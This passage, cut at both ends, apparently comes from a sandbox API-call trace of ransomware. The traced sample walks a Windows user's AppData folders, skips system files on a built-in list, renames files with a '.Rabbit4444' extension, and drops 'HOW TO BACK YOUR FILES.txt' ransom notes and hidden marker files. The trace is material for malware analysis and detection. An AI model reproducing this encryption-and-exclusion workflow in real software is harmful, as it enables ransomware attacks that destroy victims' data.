lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.602] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe77bcd0b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe77bcd0b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe77bcd0b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.602] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.602] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.602] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roottools.conf", cAlternateFileName="ROOTTO~1.CON")) returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="Rabbit4444.exe") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2=".") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="..") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="windows") returned -1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="bootmgr") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="pagefile.sys") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="boot") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="ids.txt") returned 1 [0050.602] lstrcmpiW (lpString1="roottools.conf", lpString2="NTUSER.DAT") returned 1 [0050.602] lstrcpyW (in: lpString1=0x130eb98, lpString2="roottools.conf" | out: lpString1="roottools.conf") returned="roottools.conf" [0050.602] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf", dwFileAttributes=0x0) returned 1 [0050.603] lstrlenW (lpString="roottools.conf") returned 14 [0050.603] lstrlenW (lpString="Rabbit4444") returned 10 [0050.603] lstrcmpiW (lpString1="tools.conf", lpString2="Rabbit4444") returned 1 [0050.603] lstrlenW (lpString=".dll") returned 4 [0050.603] lstrcmpiW (lpString1="conf", lpString2=".dll") returned 1 [0050.603] lstrlenW (lpString=".lnk") returned 4 [0050.603] lstrcmpiW (lpString1="conf", lpString2=".lnk") returned 1 [0050.603] lstrlenW (lpString=".ini") returned 4 [0050.603] lstrcmpiW (lpString1="conf", lpString2=".ini") returned 1 [0050.603] lstrlenW (lpString=".sys") returned 4 [0050.603] lstrcmpiW (lpString1="conf", lpString2=".sys") returned 1 [0050.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\roottools.conf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.603] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.603] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14191412802) returned 1 [0050.603] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=76) returned 1 [0050.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0050.604] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x350, lpName=0x0) returned 0x298 [0050.605] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x350) returned 0x70000 [0050.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.606] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14191691591) returned 1 [0050.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0050.606] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.606] CloseHandle (hObject=0x298) returned 1 [0050.606] CloseHandle (hObject=0x278) returned 1 [0050.606] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.Rabbit4444") returned 73 [0050.607] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\roottools.conf"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\roottools.conf.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\roottools.conf.rabbit4444"), dwFlags=0x1) returned 1 [0050.607] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5c77649, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0xd5c77649, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0xd5c77649, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roottools.conf", cAlternateFileName="ROOTTO~1.CON")) returned 0 [0050.607] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0050.607] lstrcpyW (in: lpString1=0x130eb98, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Skype\\RootTools\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\skype\\roottools\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.609] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.609] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.609] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.609] CloseHandle (hObject=0x278) returned 1 [0050.609] CloseHandle (hObject=0x27c) returned 1 [0050.609] GetCurrentThreadId () returned 0xd98 [0050.609] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6370 [0050.609] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0050.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10d3f8 | out: hHeap=0xe0000) returned 1 [0050.610] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6368 | out: hHeap=0xe0000) returned 1 [0050.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0050.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\" [0050.610] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3" [0050.610] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.613] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.616] FlushFileBuffers (hFile=0x27c) returned 1 [0050.617] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.617] CloseHandle (hObject=0x27c) returned 1 [0050.617] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned 39 [0050.617] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.617] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe77e2f46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0050.618] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.618] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.618] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.618] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe77e2f46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.618] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.618] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.618] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.618] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.618] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe77e2f46, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe77e2f46, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe77e2f46, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.618] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.618] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8b64ce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="Rabbit4444.exe") returned -1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2=".") returned 1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="..") returned 1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="windows") returned -1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="bootmgr") returned 1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="pagefile.sys") returned -1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="boot") returned 1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="ids.txt") returned -1 [0050.618] lstrcmpiW (lpString1="Extensions", lpString2="NTUSER.DAT") returned -1 [0050.618] lstrcpyW (in: lpString1=0x130eb88, lpString2="Extensions" | out: lpString1="Extensions") returned="Extensions" [0050.618] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0050.618] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x66) returned 0xf1448 [0050.618] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf6350 [0050.618] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Firefox", cAlternateFileName="")) returned 1 [0050.618] lstrcmpiW (lpString1="Firefox", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="Rabbit4444.exe") returned -1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2=".") returned 1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="..") returned 1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="windows") returned -1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="bootmgr") returned 1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="pagefile.sys") returned -1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="boot") returned 1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="ids.txt") returned -1 [0050.619] lstrcmpiW (lpString1="Firefox", lpString2="NTUSER.DAT") returned -1 [0050.619] lstrcpyW (in: lpString1=0x130eb88, lpString2="Firefox" | out: lpString1="Firefox") returned="Firefox" [0050.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0050.619] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x60) returned 0x11cac0 [0050.619] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6370 [0050.619] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfb00785a, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Firefox", cAlternateFileName="")) returned 0 [0050.619] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0050.619] lstrcpyW (in: lpString1=0x130eb88, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0050.619] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0050.621] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0050.621] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0050.621] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.621] CloseHandle (hObject=0x278) returned 1 [0050.622] CloseHandle (hObject=0x27c) returned 1 [0050.622] GetCurrentThreadId () returned 0xd98 [0050.622] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0050.622] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox" [0050.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11cac0 | out: hHeap=0xe0000) returned 1 [0050.622] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0050.622] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox" [0050.622] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\" [0050.622] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3" [0050.622] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0050.625] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0050.627] FlushFileBuffers (hFile=0x27c) returned 1 [0050.628] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0050.628] CloseHandle (hObject=0x27c) returned 1 [0050.628] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox") returned 47 [0050.628] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.628] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe78091a7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0050.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.629] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.629] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0050.629] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.629] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe78091a7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.629] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.629] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0050.629] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0050.629] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.629] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.629] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe77e2f46, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe77e2f46, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe78091a7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0050.629] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.629] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0050.629] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfafe15e1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Crash Reports", cAlternateFileName="CRASHR~1")) returned 1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="Rabbit4444.exe") returned -1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2=".") returned 1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="..") returned 1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="windows") returned -1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="bootmgr") returned 1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="pagefile.sys") returned -1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="boot") returned 1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="ids.txt") returned -1 [0050.629] lstrcmpiW (lpString1="Crash Reports", lpString2="NTUSER.DAT") returned -1 [0050.629] lstrcpyW (in: lpString1=0x130eb98, lpString2="Crash Reports" | out: lpString1="Crash Reports") returned="Crash Reports" [0050.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0050.629] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x7c) returned 0x101af0 [0050.629] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6370 [0050.629] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, 